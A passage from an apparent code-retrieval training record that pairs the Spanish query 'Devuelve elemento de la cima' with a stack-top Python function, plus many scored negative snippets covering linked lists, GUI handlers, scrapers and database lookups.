100!\")\n\n plt.figure()\n plt.suptitle('Primele 100 de piese ale mozaicului sunt:')\n idxImg = 0\n for i in range(10):\n for j in range(10):\n idxImg += 1\n plt.subplot(10, 10, idxImg)\n plt.axis('off')\n plt.imshow(pieseMozaic[idxImg - 1])\n\n plt.show()\n\n # gray image\n if params.imgReferinta.shape[2] == 1:\n pieseMozaicG = []\n for i in range(pieseMozaic.shape[0]):\n img = cv2.cvtColor(pieseMozaic[i], cv2.COLOR_RGB2GRAY)\n img = img[:, :, None]\n pieseMozaicG.append(img)\n pieseMozaicG = np.array(pieseMozaicG)\n params.pieseMozaic = pieseMozaicG\n else:\n params.pieseMozaic = pieseMozaic\n\n if params.hexagon == 1:\n params = getHexagonMatrix(params,\n pieseMozaic[0].shape[0],\n pieseMozaic[0].shape[1])\n\n return params", "def usar(self, ventana):\n self.objeto = self.busqueda.objeto\n self.set_text(self.objeto.__str__())\n self.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#FFFFFF\"))\n self.busqueda.destroy()" ]
[ "0.61714435", "0.61389273", "0.6033699", "0.5995851", "0.5916466", "0.5895718", "0.58551925", "0.5754909", "0.5726794", "0.5719078", "0.5699067", "0.56908727", "0.5681546", "0.56783044", "0.5675249", "0.5675179", "0.56316787", "0.55975395", "0.55830395", "0.55497795", "0.5538994", "0.55239606", "0.55217326", "0.5504797", "0.5500727", "0.5465768", "0.5437616", "0.5422737", "0.54194456", "0.5393014", "0.5390354", "0.5378103", "0.53663665", "0.5356854", "0.53561014", "0.53553367", "0.53490216", "0.5348721", "0.53354317", "0.5330773", "0.53234017", "0.5313325", "0.53016996", "0.52847177", "0.52797073", "0.52740425", "0.52726316", "0.52700865", "0.5264751", "0.5246081", "0.52407616", "0.5240596", "0.52393734", "0.5216288", "0.52158284", "0.5214596", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5213667", "0.5211453", "0.5211354", "0.5210339", "0.5200933", "0.5195834", "0.51815784", "0.51815784", "0.5173195", "0.5164552", "0.5163713", "0.51626354", "0.51593226", "0.515304", "0.51443315", "0.51338875", "0.51266843", "0.5122071", "0.5113498", "0.5112786", "0.5108598", "0.5106672", "0.5096284", "0.5087527", "0.50727236", "0.50710344", "0.50627387", "0.50603706", "0.5058854", "0.5058854", "0.5058854", "0.50492185", "0.5049063", "0.50489867", "0.504522", "0.50419617", "0.50384885", "0.5031573" ]
0.6247548
0
Devuelve elemento de la cima
def cima(pila): return pila.datos[pila.tope]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def first(self):\n if self.is_empty():\n raise Empty('La cola está vacía')\n return self._head._element # frente alineado con la cabeza de la lista", "def getFactura(self): \n return self.caja", "def getFactura(self): \n return self.caja", "def Cima(self):\n if(self.Pila_Vacia()=='true'):\n return \"Pila Vacia\"\n else:\n return self.pila[self.puntero]", "def valor(self):\n try:\n objeto = self.objeto\n except AttributeError:\n objeto = None\n return objeto", "def marcarPunto(self):\n # Es primera vez que marco\n if self.tempSelected == None:\n # Capturo el ultimo elemento se se selecciono\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")\n else:\n # Desmarco el anterior\n self.telaMAPA.itemconfigure(self.tempSelected, fill=\"white\")\n # Marco el nuevo\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")", "def scrape_carteleraVIEJA(data, comp_nom):\t\n\t\n\tfunciones = []\n\tsoup = BeautifulSoup(data, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\t\n\t#Busca complejo platino... en caso de existir:\n\tcomplejo_platino = complejo_org\n\t\n\t\n\tpeliculas = soup.find('table', cellspacing='0', cellpadding='0', border='0').contents[3:-1:2]\n\t\n\tfor peli in peliculas:\n\t\ttres_D = False\n\t\tidioma = None\n\t\t\n\t\t#Checar tiene logo de 3d\n\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\n\t\t#Encabezado contiene titulo e idioma\n\t\tencabezado = peli.find('li', 'texto_3', style='margin: 2px 0px 0px; float: left; width: 155px;')\n\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\n\t\t\n\t\t#Determina Idioma\n\t\tif encabezado.find('img', alt='idioma').get('src', '').find('ing') > 0:\n\t\t\tidioma = 'ingles'\n\t\telse:\n\t\t\tidioma = 'espanol'\n\t\t\n\t\ttit = '|'+ titulo + '|'\n\t\t#Buscar pelicula por titulo segun idioma y 3d.. subtitulada o no.\n\t\tpeli_query = Pelicula.objects.filter(alt_tit__icontains=tit, tres_D=tres_D)\n\t\tif len(peli_query) > 1:\n\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\tpelicula = peli_query.filter(subtitulada= (idioma == 'ingles') )\n\t\telif len(peli_query) == 1:\n\t\t\tpelicula = peli_query[0]\n\t\telse:\n\t\t\tlogger.debug( \"No se encontro pelicula %s\" % titulo\t\t)\n\t\t\t\n\t\thoras_html = peli.find('div', id='horax')\n\t\tplatino_b= False\t\t\n\t\tfor tag in horas_html.contents:\n\t\t\t#Me salto todo lo que no es html\n\t\t\tif type(tag) != NavigableString:\t\t\n\t\t\t\t#En caso de que sea funciones de platino\n\t\t\t\tif tag.name == 'center':\n\t\t\t\t\tplatino_b = True\n\t\t\t\t\tfuncion_name = ''.join(tag.findAll(text=True)).strip()\n\t\t\t\t\tif funcion_name.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\t\n\t\t\t\telif tag.get('style','').find('border-bottom: 1px solid rgb(238, 207, 0);') > -1:\n\t\t\t\t\t#Ajustar de regreso el complejo normal\n\t\t\t\t\tcomplejo = complejo_org\n\t\t\t\t\tplatino_b = False\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t#Si es renglon de hora y no algo mas como <br/>\t\t\t\n\t\t\t\tif tag.name== 'div' and tag.get('id','') == 'general':\n\t\t\t\t\tfecha = parseDate(tag.find('div', id=fecha).string)\n\t\t\t\t\tfunciones.extend(\n\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t'pelicula': pelicula,\n\t\t\t\t\t\t\t'complejo': complejo,\n\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n\t\t\t\t\t\t\t} for hora_html in tag.find('div', id='funciones').find('a', 'texto_1')]\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t)\n\t\t\t\t\t#logger.debug( funciones)\n\treturn funciones", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def obter_caminho(self):\n return self.caminho", "def scraper_voto(self):\n\n #per trovare il link a fantacalcio.it devo prima trovare il link della squadra e trovare il suo nome\n soup_rosa = BeautifulSoup(\n requests.get(f\"{self.LINK_FANTACALCIO_IT}/{self.team}#rosa\").text,\n \"html.parser\",\n )\n print(self.name)\n\n displayed_name = self.name\n if displayed_name == \"Coulibaly\": # caso estremo, il sito si confonde\n displayed_name = \"Coulibaly M.\"\n\n # trovo il link personale del giocatore e glielo assegno\n link = soup_rosa.find(\"a\", text=displayed_name.upper())[\"href\"]\n self.scheda_giocatore = link\n\n # leggo voto e media voto\n soup = BeautifulSoup(requests.get(link).text, \"html.parser\")\n\n self.media_voto = float(soup.find_all(class_=\"nbig2\")[0].text.replace(\",\", \".\"))\n self.media_fantavoto = float(\n soup.find_all(class_=\"nbig2\")[1].text.replace(\",\", \".\")\n )\n\n # leggo anche il ruolodalla schedina delle info\n infos = soup.find_all(class_=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\")[-2]\n self.ruolo = str(infos.find(\"span\").text)\n\n # compilo i dati: partite, gol e assist\n dati_partite = soup.find_all(class_=\"nbig\")\n\n partite = \"🥅 \" + dati_partite[0].text\n # i portieri hanno statistiche diverse!\n if self.ruolo == \"P\":\n goal = \"❌ \" + dati_partite[1].text\n self.dati = \"<br>\".join([partite, goal])\n else:\n goal = \"⚽ \" + dati_partite[1].text\n assist = \"👟 \" + dati_partite[2].text\n self.dati = \"<br>\".join([partite, goal, assist])\n\n # aggiungo stellina al nome se hanno una bella media voto\n if self.media_fantavoto > 7:\n self.name += \" ⭐\"", "def removeItem(self, valor):\n if not self.esta_vazia():\n ## Os dois ponteiros apontam pro primeiro elemento da lista\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n while True:\n ## Se o elemento for encontrado\n if elementoAtual._inteiro == valor:\n while elementoAtual._inteiro == valor:\n if elementoAtual == elementoAnterior:\n ## Se o elemento a ser removido é o primeiro\n self.removeInicio()\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n else:\n elementoAnterior._proximo = elementoAtual._proximo\n elementoAnterior._proximo._anterior = elementoAnterior\n elementoAtual = elementoAnterior._proximo\n if elementoAtual == self._cabeca:\n break\n break\n else:\n ## se o elemento não foi encontrado ainda\n if elementoAnterior != elementoAtual:\n ## Avança o ponteiro que marca o nó anterior apenas quando não é a primeira passagem\n ## do Loop (os dois ponteiros já estão diferentes)\n elementoAnterior = elementoAnterior._proximo\n ## de qualquer forma avança o ponteiro para o atual\n elementoAtual = elementoAtual._proximo\n ## Testar se o elemento buscado não existe\n if elementoAtual == self._cabeca:\n break\n return None", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def mezclar_bolsa(self):", "def get_posicion(self):\n return self.posicion", "def first(self):\n if self.is_empty():\n raise Empty(\"Deque está vacío\")\n return self._header._next._element # un artículo real justo después de la cabecera", "def afficher(dico):\n return dico", "def retirer_objet(self, nom_membre):\n membre = self.get_membre(nom_membre)\n objet = membre.tenu\n membre.tenu = None", "def __init__(self):\n self.enfila= 0\n self.fila = []", "def atributo_complejidad():\n tipo_defecto = ItemTipos.objects.filter(es_supertipo=True)\n if tipo_defecto.count() > 0:\n attr1 = ItemAtributos.objects.filter(nombre='complejidad').\\\n filter(idtipoitem=tipo_defecto)\n return attr1\n return None", "def elemento_actual(self):\n\t\tif not self.actual:\n\t\t\treturn None\n\t\treturn self.actual.dato", "def pretraga_po_cijeni(self, lst, broj):\n pretrazeno = []\n for i in lst:\n if i.cijena == broj:\n pretrazeno.append(i)\n return pretrazeno", "def elems(self):", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def get_contenu(self):\n return self.objets", "def get_first_item(self):\n params = urllib.parse.urlencode({'o':'1', 'q':self.query})\n url = 'https://www.leboncoin.fr/annonces/offres/ile_de_france/?{:s}'.format(params) # Cree l'url de recherche en get\n html = urllib.request.urlopen(url)\n if url != html.geturl():\n return None\n soup = BeautifulSoup.BeautifulSoup(html, 'html5lib')\n try:\n products = soup.section.find_all('a', 'list_item clearfix trackable')\n except Exception as e:\n print('Nothing found on leboncoin')\n return None\n for product in products: # recupere les differentes informations de chaque produit\n if str(product.section.h2).strip() == 'None':\n continue\n name = product.section.h2.contents[0].strip()\n price = self.__get_price(product)\n link = 'http:' + product['href']\n return (name, price, link)\n return None", "def _pega_no(self, index):\n ponteiro = self.inicio\n for i in range(index):\n if ponteiro:\n ponteiro = ponteiro.prox\n else:\n raise IndexError(\"list index out of range\")\n return ponteiro", "def __init__(self):\n self.tours = []\n self.grille = Grille()", "def retroceder(self):\n\t\tif self.pila_anteriores.esta_vacia(): \n\t\t\traise StopIteration(\"Esta al principio.\")\n\t\tself.actual = self.anterior\n\t\tself.anterior = self.pila_anteriores.desapilar()\n\t\tself.posicion -= 1\n\t\treturn self.actual.dato", "def carregarTurma(self, ide):\r\n self.__id = str(ide)\r\n self.cursor.execute(\"SELECT * FROM TURMA WHERE ID = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None", "def ustal_kon(self, f):\n kon= Kon.objects.using(settings.DBS(self.firma)).filter(id= f.nip_nabywcy)\n if kon:\n return kon[0]\n \n kon= Kon()\n \n # Numer dla zagranicznego\n nr_kon= Kon.objects.using(settings.DBS(self.firma)).exclude(nr_kon__startswith= 'Z').aggregate(Max('nr_kon'))\n kon.nr_kon= '{:05d}'.format(int(nr_kon['nr_kon__max'].strip())+1)\n\n if '/' in f.nazwa_nabywcy:\n kon.skrot, kon.nazwa= f.nazwa_nabywcy.split('/')\n else:\n kon.nazwa= f.nazwa_nabywcy\n \n kon.id= f.nip_nabywcy\n kon.idtyp= 'NIPUE' if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'NIP'\n kon.ulica, kon.kod, kon.miejsc= self.adres_kon(f.adres_nabywcy)\n \n kon.kraj= f.nip_nabywcy[:2] if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'PL'\n \n kon.id_obcy= f.id # zapamiętanie skąd się zwiął (faktura)\n \n kon.skrot= su(kon.skrot)\n kon.nazwa= su(kon.nazwa)\n kon.miejsc= su(kon.miejsc)\n kon.ulica= su(kon.ulica)\n \n kon.kiedy= datetime.date.today() # data utworzenia\n kon.data_us= kon.kiedy\n if f.termin_platnosci and f.data_wystawienia:\n kon.term_zap= (f.termin_platnosci - f.data_wystawienia).days\n \n kon.save(using= settings.DBS(self.firma))\n \n return kon", "def incarcaPieseMozaic(params):\n \n print('Incarcam piesele pentru mozaic din director.')\n\n pieseMozaic = []\n # for img_path in sorted(glob.glob(params.numeDirector\n # + '*.'\n # + params.tipImagine),\n # key=lambda name: int(name[len(params.numeDirector)\n # :-4])):\n for img_path in glob.glob(params.numeDirector\n + '*.'\n + params.tipImagine):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pieseMozaic.append(img)\n pieseMozaic = np.array(pieseMozaic)\n\n if params.afiseazaPieseMozaic:\n # afiseaza primele 100 de piese ale mozaicului\n if pieseMozaic.shape[0] < 100:\n raise Exception(\"Numarul de piese este mai mic decat 100!\")\n\n plt.figure()\n plt.suptitle('Primele 100 de piese ale mozaicului sunt:')\n idxImg = 0\n for i in range(10):\n for j in range(10):\n idxImg += 1\n plt.subplot(10, 10, idxImg)\n plt.axis('off')\n plt.imshow(pieseMozaic[idxImg - 1])\n\n plt.show()\n\n # gray image\n if params.imgReferinta.shape[2] == 1:\n pieseMozaicG = []\n for i in range(pieseMozaic.shape[0]):\n img = cv2.cvtColor(pieseMozaic[i], cv2.COLOR_RGB2GRAY)\n img = img[:, :, None]\n pieseMozaicG.append(img)\n pieseMozaicG = np.array(pieseMozaicG)\n params.pieseMozaic = pieseMozaicG\n else:\n params.pieseMozaic = pieseMozaic\n\n if params.hexagon == 1:\n params = getHexagonMatrix(params,\n pieseMozaic[0].shape[0],\n pieseMozaic[0].shape[1])\n\n return params", "def get(self, el):\n raise Exception('TODO IMPLEMENT ME !')", "def __init__(self):\n mi_parqueo = list()", "def busqueda_por_atributo(self, atributo, valor):\n\n paquetes = []\n\n if atributo == \"Número de dormitorios\":\n for casa in self.casas:\n if casa.numero_dormitorios >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Número de baños\":\n for casa in self.casas:\n if casa.numero_banos >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Numero de cocinas\":\n for casa in self.casas:\n if casa.numero_cocinas >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)", "def an_element(self):\n return self.a_realization().an_element()", "def _buscar_autos(self, placa):\n for auto in self.mi_parqueo:\n if str(auto.placa) == str(placa):\n return auto\n \n return None", "def __init__(self):\n self.modelo = [\"A\", \"sucio\", \"sucio\",\"sucio\", \"sucio\",\"sucio\", \"sucio\"]", "def __iter__(self):\n return _Iter_Ciudad_(self.aeropuertos)", "def arredonda(elemento):\n chave, mm = elemento\n return (chave,round(mm,1))", "def returnIdAluno(self):\r\n self.cursor.execute(\"SELECT MATRICULA FROM ALUNO;\")\r\n self.__result = self.cursor.fetchall()\r\n self.__lista = []\r\n try:\r\n for self.__i in self.__result:\r\n self.__lista.append(self.__i[0])\r\n return self.__lista\r\n except:\r\n return []", "def entrer(self):\n valeur = getattr(self.objet, self.attribut, None)\n if valeur is None:\n setattr(self.objet, self.attribut, [])", "def valorEsperado(obs,ket):\n cal=Calculadora()\n obsSobreket=cal.accion(obs,ket)\n bra=cal.matrizConjugada(obsSobreket)\n ket1=cal.transpuesta([ket])\n bra1=cal.transpuesta(bra)\n car=cal.multiplicacionMatrizMatriz(bra1,ket1)[0][0]\n return car", "def element(self):\n return self._element", "def cargarObra(self):\n rowActual=self.tableObra.currentItem().row()\n self.lineObra.setText(str(self.tableObra.item(rowActual,0).text()))\n self.lineCuit.setText(str(self.tableObra.item(rowActual,1).text()))\n self.tableObra.hide()\n self.lineObra.setEnabled(False)\n self.lineCuit.setEnabled(False)\n self.obraSocialSeleccionada = str(self.lineObra.text())\n self.cargar_productos(self.obraSocialSeleccionada)\n self.gbProducto.setVisible(True)", "def test_recupera_un_solo_elemento(self):\n detalle = reverse(\"musica:detail\", kwargs={\"pk\": self.musica1.id})\n respuesta = self.client.get(detalle)\n # print(respuesta.data['id'])\n self.assertEqual(200, respuesta.status_code)\n valor_consulta = Musica.objects.get(id=respuesta.data[\"id\"])\n # print(valor_consulta)\n self.assertEqual(respuesta.data[\"cancion\"], valor_consulta.cancion)\n self.assertEqual(respuesta.data[\"artista\"], valor_consulta.artista)\n self.assertEqual(respuesta.data[\"año\"], str(valor_consulta.año))", "def carregarAluno(self, matricula):\r\n try:\r\n self.__id = int(matricula)\r\n self.cursor.execute(\"SELECT * FROM ALUNO WHERE MATRICULA = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None\r\n except:\r\n return None", "def getSituacaoAeroporto(self):\n soup = BeautifulSoup(self.getContent(url_direct.get('dash-aero-situacao')))\n list_situation = []\n for aeport in self.list_aeport.keys():\n element = soup.findAll('li', {'id': aeport})[0]\n name_class = element.get('class')[0]\n list_aeport = self.list_aeport.get(aeport)\n list_situation.append({'sigla': aeport,\n 'name': list_aeport.get('name'),\n 'local': list_aeport.get('local'),\n 'codigo': list_aeport.get('codigo'),\n 'status': self.situation_aeport.get(name_class),\n 'name_class': name_class,\n 'site': list_aeport.get('site')})\n return list_situation", "def documento(self):\n return self.persona.documento", "def get(self, index):\n if self.head is None:\n raise Exception('Node vide')\n else:\n return self.leonardo_recurs(index, self.head)", "def __getitem__(self, nom_canal):\n return self._canaux[nom_canal]", "def minimo(self, no):\n if no is not None:\n while no.getEsquerdo() is not None:\n no = no.getEsquerdo()\n return no", "def getPrincipal(self):\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get(\"ex-clima-media\")))\n temp_media = self.getTempMedia()\n hour = localtime(time()).tm_hour\n self.soup = BeautifulSoup(self.getContent(url_direct.get(\"ex-clima\")))\n prevision = self.getHour(hour)\n\n content = '<ul id=\"servicos-externos\" style=\"display: block;\">' \\\n '<li class=\"ex-clima\"><div class=\"dash-border\"><strong class=\"titulo-dash\">Tempo' \\\n '</strong><div class=\"tempo-g nb\"></div><div class=\"t-media\"><span>Média</span>' \\\n '<span id=\"CGE-media\" class=\"amarelo bold\">' + temp_media + '</span></div><div class=\"tempestade\">' \\\n '<span>Potencial <div class=\"raio\"></div></span>' \\\n '<span id=\"status-temp\" class=\"amarelo\">' + prevision + '</span></div></div>' \\\n '<div class=\"ex-hover\"><div></div></div></li>'\n except:\n content = self.getContentExcept(class_li='ex-clima', text_div='CGEb')\n\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get('qualidade-oxigenio')))\n qualidade_ar = self.getDescQualidade()\n content += '<!-- AR -->' \\\n '<li class=\"ex-ar\"><div class=\"dash-border\"><strong class=\"titulo-dash\">Qualidade do Ar</strong>'\\\n '<div class=\"dash-img o2quali\"></div><b class=\"bullet-verde em2\">' + qualidade_ar + '</b></div>' \\\n '<div class=\"ex-hover\"><div></div></div></li>'\n except:\n content += self.getContentExcept(class_li='ex-ar', text_div='Qualidade do Ar')\n\n content += '<!-- Aeroportos -->' \\\n '<li class=\"ex-aero\">' \\\n '<div class=\"dash-border\"><strong class=\"titulo-dash\">Aero</strong>' \\\n '<br>Consultar situação</div>' \\\n '</li>'\n\n content += '<!-- Transporte público -->' \\\n '<li class=\"ex-publico\">' \\\n '<div class=\"dash-border\">' \\\n '<strong class=\"titulo-dash\">Transporte Público</strong>' \\\n '<div class=\"dash-img\"></div>' \\\n '<a href=\"http://www.sptrans.com.br/itinerarios/\" target=\"_blank\" class=\"azul-pq\">Busca de itinerários</a>' \\\n '</div>' \\\n '<div class=\"ex-hover\"><div></div></div>' \\\n '</li>'\n\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get('transito-agora')))\n lentidao = self.getLentidao()\n content += '<!-- Trânsito-->' \\\n '<li class=\"ex-transito\"><div class=\"dash-border\"><strong class=\"titulo-dash\">' \\\n 'Trânsito</strong><div class=\"dash-img semaforo\"></div>' \\\n '<b class=\"amarelo em15\" id=\"lento\">' + lentidao + 'km</b><br>' \\\n '<span class=\"em09 bold\">de lentidão</span><br><span class=\"kmStatus verde\">' \\\n '<i class=\"ball-status verde\"></i>livre</span></div><div class=\"ex-hover\"><div></div></div></li>'\n except:\n content += self.getContentExcept(class_li='ex-transito', text_div='Transito')\n\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get('dash-rodisio')))\n placa_rodisio = self.getRestricaoPlacaFinal()\n content += '<!-- Rodizio -->' \\\n '<li class=\"ex-rodizio\">' \\\n '<div class=\"dash-border\"><strong class=\"titulo-dash\">Rodízio</strong>' \\\n '<div class=\"dash-img\"></div><b id=\"rodizio_hoje\"></b>Placas final <br>' \\\n '<b class=\"azul-gd\">' + placa_rodisio + '</b> </div><div class=\"ex-hover\">' \\\n '<div></div></div>' \\\n '</li></ul>'\n except:\n content += self.getContentExcept(class_li='ex-rodizio', text_div='Rodízio')\n return content", "def obtener_peso_arista(self, v, w):\n return self.vertices[v][w]", "def __correio(soup):\n news = []\n json_content = json.loads(soup.text)\n entries = json_content[\"matia\"]\n\n for entry in entries:\n title = entry[\"title\"]\n url = entry[\"link\"]\n news.append(dict(title=title, link=url))\n if(len(news) >= 10):\n break\n\n return news", "def es_satisfecho_por(self, candidata):", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def index(self, elem):\n ponteiro = self.inicio\n i = 0\n while(ponteiro):\n if ponteiro.dado == elem:\n return i\n ponteiro = ponteiro.prox\n i = i + 1\n raise ValueError(\"{} is not in list\".format(elem))", "def __init__(self):\n self.tiempos = ListaEnlazada() # Marcas de tiempo\n self.tracks = [] # Lista de tracks", "def __init__(self):\n\t\tself.Nombre = \"\"\n\t\tself.Apellido = \"\"\n\t\tself.Edad = \"\"\n\t\tself.Sexo = \"Masculino\"\n\t\t\"\"\"Fecha de la carga del paciente dentro del software\"\"\"\n\t\tself.Fecha = strftime(\"%H : %M : %S\", gmtime())\n\t\t\"\"\"Estudio a realizar sobre la muestra\"\"\"\n\t\tself.Test = \"GLU\"\n\t\t\"\"\"Numero identificatorio unico de paciente en estudio\"\"\"\n\t\tself.ID = 0\n\t\t\"\"\"Posicion dentro del carrusel de muestras\"\"\"\n\t\tself.Posicion = \"\"\n\t\t\"\"\" La prioridad tiene dos estados: Es \"True\" si se requiere \n\t\tque el estudio para este paciente sea \n\t\trealizado inmediatamente \"\"\"\n\t\tself.Prioridad = False\n\t\t\"\"\" Boton desactivado de informe \"\"\"\n\t\tself.Informe = GdkPixbuf.Pixbuf.new_from_file('./Glade/botonnodisponible2.png')\n\t\t\"\"\"Resultado\"\"\"\n\t\tself.Resultado = \"5 g/ml\"\n\t\t\"\"\"Valor inicial de la barra de progreso\"\"\"\n\t\tself.Progreso = 1", "def buscaPalavras(self):\n dataSet=self.stemmerAplay()\n todasPalavras =[]\n for (notice, clazz) in dataSet:\n todasPalavras.extend(notice)\n return todasPalavras", "def particle(lieu):\r\n\r\n path = \"https://air.plumelabs.com/fr/live/{}\".format(lieu)\r\n request_html = requests.get(path)\r\n page = request_html.content\r\n soup = BeautifulSoup(page, \"html.parser\")\r\n\r\n liste = []\r\n propriete = soup.find_all(\"div\")\r\n for i in propriete:\r\n liste.append(i.get_text())\r\n\r\n\r\n liste_e = liste[20:21]\r\n pollute = liste_e[0][31:34]\r\n\r\n return pollute", "def _getConteudoPublicado(self, id_conteudo=None, mkl=None):\n conteudo = None\n for conteudo in self.execSql(\"select_dados\",\n id_conteudo=int(id_conteudo)):\n break\n\n if conteudo:\n soup = BeautifulSoup(conteudo[\"regulamento\"],\n fromEncoding=settings.GLOBAL_ENCODING)\n for a in soup.findAll(\"a\"):\n href = unquote(a.get(\"href\", \"\")).strip()\n if href.startswith(\"#h2href:\"):\n kingkong, dados = href.split(\"#h2href:\", 1)\n if mkl:\n href, attrs = mkl(dados=decode(dados))\n for i in attrs.keys():\n a[i] = attrs[i]\n else:\n href = self._renderLink(dados=dados)\n\n if href.find(\"javascript\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n elif href.find(\"target=blank\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n a[\"target\"] = \"blank\"\n\n a[\"href\"] = href\n conteudo[\"regulamento\"] = unquote( unicode(soup) )\n \n soup = BeautifulSoup(conteudo[\"descricao\"],\n fromEncoding=settings.GLOBAL_ENCODING)\n for a in soup.findAll(\"a\"):\n href = unquote(a.get(\"href\", \"\")).strip()\n if href.startswith(\"#h2href:\"):\n kingkong, dados = href.split(\"#h2href:\", 1)\n if mkl:\n href, attrs = mkl(dados=decode(dados))\n for i in attrs.keys():\n a[i] = attrs[i]\n else:\n href = self._renderLink(dados=dados)\n\n if href.find(\"javascript\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n elif href.find(\"target=blank\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n a[\"target\"] = \"blank\"\n\n a[\"href\"] = href\n conteudo[\"descricao\"] = unquote( unicode(soup) )\n conteudo[\"campos\"] = [i for i in self.execSql(\"select_conteudo_campos\",\n id_conteudo=int(conteudo[\"id_conteudo\"]))]\n return conteudo", "def __init__(self, altura, peso, edad):\n\t\tself.altura = altura # OJO TODAS LAS VARIABLES SON PUBLICAS \n\t\tself.peso = peso \n\t\tself.edad = edad\n\t\tself.profesion = \"\" # esta la inicializamos nosotros\n\t\tself.lista_tareas = []\n\t\tself.__privado = 1 # este atributo es privado no podemos acceder a el desde fuera", "def retireSommet(self, sommet):\r\n nouveauGraphe = copy.deepcopy(self) # on effectue une copie du graphe\r\n nouveauGraphe.n = self.n-1 # On a n-1 points\r\n # NB: il faut aussi changer m et listeArretes mais on va pas le faire tout de suite car pas urgent\r\n # 1. On suprrime la ligne d'indice sommet\r\n #* AUTRE MÉTHODE del nouveauGraphe.adjMatrix[sommet]\r\n # print(nouveauGraphe.adjMatrix)\r\n nouveauGraphe.adjMatrix.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n #2. On supprime la colonne d'indice sommet = on supprime l'index sommet de chaque sous liste\r\n # la liste comprehension ne marche pas bien :(\r\n for line in nouveauGraphe.adjMatrix:\r\n line.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n # nouveauGraphe.m = 0\r\n # 2ème méthode:\r\n # for ligne in nouveauGraphe.adjMatrix:\r\n # ligne.pop(sommet)\r\n return nouveauGraphe", "def avanzar(self):\n\t\tif (not len(self.lista)) or (self.esta_al_final()): \n\t\t\traise StopIteration(\"Esta al final.\")\n\t\tself.pila_anteriores.apilar(self.anterior)\n\t\tself.anterior = self.actual\n\t\tself.actual = self.actual.prox\n\t\tself.posicion += 1\n\t\treturn self.actual.dato", "def get_info_materia(codigo):\n\n materia = {}\n\n codigo = codigo.replace('.', '')\n d = pq(requests.get(URL_MATERIA.format(materia=codigo)).text)\n materia['nombre'] = d('#principal h3').text().replace(\n 'Cursos de la materia ', '')\n\n materia['cursos'] = []\n for tr in d('#principal tr'):\n pq_curso = pq(tr)\n profesor = pq_curso('.tablaitem:eq(2)').text()\n\n if profesor:\n materia['cursos'].append({'profesor': profesor,\n 'clases': _get_clases(pq_curso)})\n\n return materia", "def obtem_fila(self):\n\n return self.fila", "def getSituacaoAeroportoVoo(self, 